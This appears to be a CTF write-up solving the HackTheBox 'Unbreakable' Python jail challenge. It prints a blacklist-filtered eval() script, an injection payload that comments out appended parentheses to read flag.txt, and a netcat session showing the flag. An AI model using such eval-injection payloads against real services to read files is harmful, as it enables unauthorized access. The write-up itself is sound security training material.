HackTheBox Cyber Apocalypse 2024: Hacker Royale

HackTheBox CTF Cyber Apocalypse 2024: Hacker Royale

View on GitHub

Unbreakable

Think you can escape my grasp? Challenge accepted! I dare you to try and break free, but beware, it won’t be easy. I’m ready for whatever tricks you have up your sleeve!

Files:

Writeup by: Stig Rune Grønnestad

Recon

Python script, let’s take a look at it.

blacklist = [ ';', '"', 'os', '_', '\\', '/', '`',
              ' ', '-', '!', '[', ']', '*', 'import',
              'eval', 'banner', 'echo', 'cat', '%', 
              '&', '>', '<', '+', '1', '2', '3', '4',
              '5', '6', '7', '8', '9', '0', 'b', 's', 
              'lower', 'upper', 'system', '}', '{' ]

while True:
  ans = input('Break me, shake me!\n\n$ ').strip()
  
  if any(char in ans for char in blacklist):
    print(f'\n{banner1}\nNaughty naughty..\n')
  else:
    try:
      eval(ans + '()')
      print('WHAT WAS THAT?!\n')
    except:
      print(f"\n{banner2}\nI'm UNBREAKABLE!\n") 

The script takes input, checks if it contains any of the characters in the blacklist, and if it does, it prints Naughty naughty... If it doesn’t, it tries to evaluate the input as a function, and if it fails, it prints I'm UNBREAKABLE!. The eval function appends () to the input, so we need to input a function name without parentheses… or maybe we can comment it out?

Solver

print(open('flag.txt','r').read())#

Executing

└─$ nc 94.237.59.119 59639
Break me, shake me!

$ print(open('flag.txt','r').read())#
HTB{3v4l_0r_3vuln??}

WHAT WAS THAT?!

Break me, shake me!

$

Flag

HTB{3v4l_0r_3vuln??}